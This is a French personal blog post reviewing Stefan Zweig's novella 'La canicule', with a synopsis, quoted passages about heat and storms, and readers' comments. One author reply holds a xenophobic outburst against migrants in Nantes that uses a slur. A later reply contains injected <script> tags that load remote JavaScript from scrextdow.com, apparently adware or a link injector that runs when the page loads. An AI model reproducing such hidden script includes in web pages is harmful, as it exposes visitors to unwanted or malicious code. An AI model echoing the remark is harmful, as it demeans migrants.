• La canicule...

     

     

     

     

     

     

    J'ai acheté un petit livre de Stefan Zweig, qu'une de mes revues recommandait, c'est un petit bijoux. Je l'ai lu d'une seule traite, en une après midi, il faut dire qu' il n'a que 57 pages.

     

    Dans un style brillant, Stefan Zweig décrit la chaleur éprouvante de la canicule, l'attente de la pluie et de sa fraîcheur.

     

    Je buvais chaque mot décrivant si bien tout ce que l'on peut ressentir dans une chaleur pesante en manque d'air... comme ce temps que nous vivons depuis la fin juin.

     

    Liviaaugustae

     

     

     

    La canicule...

     

    Une haute vallée du Tyrol, lors d'un été très chaud. Dans une pension, deux jeunes gens tombent amoureux au premier regard. Au cours d'une nuit, la jeune femme reçoit enfin l'amour passionné de celui qu'elle désire... Mais cet instant d'ivresse a-t-il eu lieu ?

     

    C'est une des œuvres les moins connues de Zweig. Elle a été redécouvert au cours de ces dernières années ; elle est considérée comme l'une des plus belles de l'écrivain aujourd'hui.

     

     

     

     

     

    Quelques extraits :

     

     

     

    « Mais la chaleur ne fit qu'augmenter de jour en jour et la pluie refusait toujours de venir. Le soleil tapait d'aplomb, du matin au soir, et progressivement son œil jaune et tourmenteur sembla prendre l'obstination inerte d'un fou... »

     

     

     

    « Le temps s'était liquéfié dans cette lourdeur affreuse, les heures, tombées en bouillie, s'était fondue dans une rêverie torride et insensée...

     

    Alors il me sembla, tout à coup, que la nature produisait un souffle, un souffle léger, autant que si, venu de quelque part, un soupir montait, brûlant et languide.... »

     

     

     

    « J'attendis et attendis, mais rien ne se passa. Le ciel jetait vers le bas un regard noir et fixe, le front tout assombri ; tout resta plusieurs minutes dans un silence de mort, mais alors il sembla passer sur le visage du ciel une lueur sarcastique. Depuis l'ouest, les hauteurs s'éclaircirent, le mur des nuages se défit progressivement et ceux-ci continuèrent à rouler avec un léger grondement. Leurs abysses se réduisirent peu à peu ; et sous l'horizon scintillant le paysage attentif s'étendait dans une déception impuissante et frustrée. Comme de rage, un léger et dernier frémissement parcourut les arbres, qui se courbèrent et se tordirent ; mais ensuite les mains du feuillage, déjà tendues avec avidité, retombèrent mollement, comme mortes. Le crêpe des nuages se fit de plus en plus transparent ; une clarté mauvaise, menaçante, surplombait le monde sans défense. Il ne s'était rien passé. L'orage s'était éclipsé. »

     

     

     

     

     

     

     

     

     

     

     


  • Commentaires

    1
    Vendredi 6 Juillet à 06:57

    Bonjour Chantal,

    Un roman que je ne connais pas. J'aime ces citations. Une grande richesse d'images qui est très agréable. On ressent cette chaleur intense. Tu me donnes envie de le lire

    Bises

    smile

      • Vendredi 6 Juillet à 10:29

        Bonjour Martine,

        C'est un petit roman pas très connu de Zweig, mais il est merveilleusement écrit et vaut le coup d'être lu.

        Bises

    2
    gazou
    Vendredi 6 Juillet à 07:06

    Tu me donnes envie de lire ce livre.

    Bonne journée, Livia !

      • Vendredi 6 Juillet à 10:30

        Tu ne le regretteras pas gazou, c'est un excellent petit livre qui se lit assez rapidement

        Bonne journée à toi aussi

    3
    Vendredi 6 Juillet à 08:50

    Merci pour la présentation de cet ouvrage Livia. La canicule je la crains et en ce moment je suis heureuse comme un pape !

    Bises et bon vendredi

      • Vendredi 6 Juillet à 10:31

        Bonjour Zaza,

        Je suis ravie pour toi, j'attends avec impatience de partir moi aussi, d'autant que Nantes est en ébullition...

        Bises et belle journée

    4
    Vendredi 6 Juillet à 08:59
    Cigalette 106

    Pas besoin de lire ce livre cela se passe en réelle:-)) bonne journée

      • Vendredi 6 Juillet à 10:31

        Bonjour Cigalette,

        En effet, nous vivons cela en réel, mais on ne peut mettre de mots sur nos maux!

        Bonne journée

    5
    Vendredi 6 Juillet à 09:20

    Un livre tout à fait dans mes goûts, j'aime les écrivains qui font de belles descriptions détaillées de la nature et des personnages.

    J'ai pensé à toi ce matin en lisant l'actualité, les violences à Nantes.

    Bonne fin de semaine, pas très présente, enfants, petits enfants présents.

    Bisous bisous

      • Vendredi 6 Juillet à 10:36

        Bonjour lili,

        Zweig excelle dans ses descriptions sur la chaleur, l'orage, et la nature endormie et pétrifiée, j'ai beaucoup aimé ce petit livre et je me félicite de l'avoir acheté.

        En effet, Nantes est en ébullition, parce que l'on a tué un malfrat "pas souschien", la ville est à feu et à sang, les bus ont été déviés, etc... j'en ai marre de ces gens-là qui viennent fiche la pagaille chez nous et Nantes est bien purvue en migrants, Airault et sa bande de socialos y ont veillé.

        Bonne fin de semaine en famille.
        Bisous bisous

    6
    Vendredi 6 Juillet à 10:37

    Bonjour

    Le livre à l'air super!

    Quand il fait chaud comme cela, cela fait du bien de lire à l'ombre avec une bonne limonade fraîche!

    Bisous

      • Vendredi 6 Juillet à 13:44

        Bonjour Wolfe,

        Ce livre est super, et je suis tout à fait d'accord pour la lecture à l'ombre avec limonade fraîche.

        Bisous

    7
    Vendredi 6 Juillet à 17:09

    Merci Liva pour ce partage, tu me donnes envie de le lire aussi

    Bises & doux week end

      • Vendredi 6 Juillet à 21:05

        Bonsoir Laure,

        C'est un petit livre très bien écrit, Monsieur Zweig est un grand écrivain.

        Je l'ai acheté sur Amazon, il est en broché. à un prix très avantageux 4,90

        Bises et belle soirée

    8
    Vendredi 6 Juillet à 17:12

    On le trouve qu'en ebook ?

     

    9
    Vendredi 6 Juillet à 19:37

    En plus c'est d'un livre d'actualité

      • Vendredi 6 Juillet à 21:06

        Bonsoir Christian,

        En effet, nous vivons un peu cet expérience, sauf que dans le bouquin la chaleur devient poétique...

    10
    Samedi 7 Juillet à 08:22

    Je n'ai pas lu ce livre, mais je le note... :)

    Merci pour cette découverte, Livia.

    Passe une douce journée.

      • Samedi 7 Juillet à 12:09

        Bonjour Quichottine,

        Ce fut pour moi aussi une jolie découverte, c'est un tout petit livre qui se lit vite qui est écrit dans un style fluide et agréable, comme sait le faire Stefan Zweig.

        Douce journée à toi aussi

    11
    Samedi 7 Juillet à 11:44

    Tu as doublé ton texte me semble-t'il. Merci pour cette chronique. Je note le titre. Bisous

      • Samedi 7 Juillet à 12:07

        Merci Brigite, de me signaler ma bévue, je ne m'en étais pas rendu compte, c'est la faute de la chaleur qui me pèse beaucoup en ce moment, je dors mal et suis fatiguée dans la journée, ce qui me rend un peu tête en l'air.

        Bisous

    12
    Samedi 7 Juillet à 16:40

    J'aime beaucoup Stefan Zweig. Je vais voir si j'ai ce titre dans ma bibliothèque.

    Merci et bon week end.

      • Dimanche 8 Juillet à 00:31

        Bonsoir,

        C'est un petit livre très prenant, comme toutes les oeuvres de Stefan Zwr=eig d'ailleurs que j'aime beaucoup moi aussi.

        Bon week end

    13
    Mardi 10 Juillet à 20:26
    Denise

    Bonsoir Livia, merci pour la description de ce joli livre.

    Mes amitiés et bisous et douce soirée.

      • Mardi 10 Juillet à 20:38

        Bonsoir Denise,

        C'est un  petit livre fort bien écrit et très intéressant.

        Mes amitiés, bisous et belle soirée

        <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>
    14
    Dimanche 15 Juillet à 15:02

    C'est formidablement bien décrit et tout à fait de circonstance. Bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :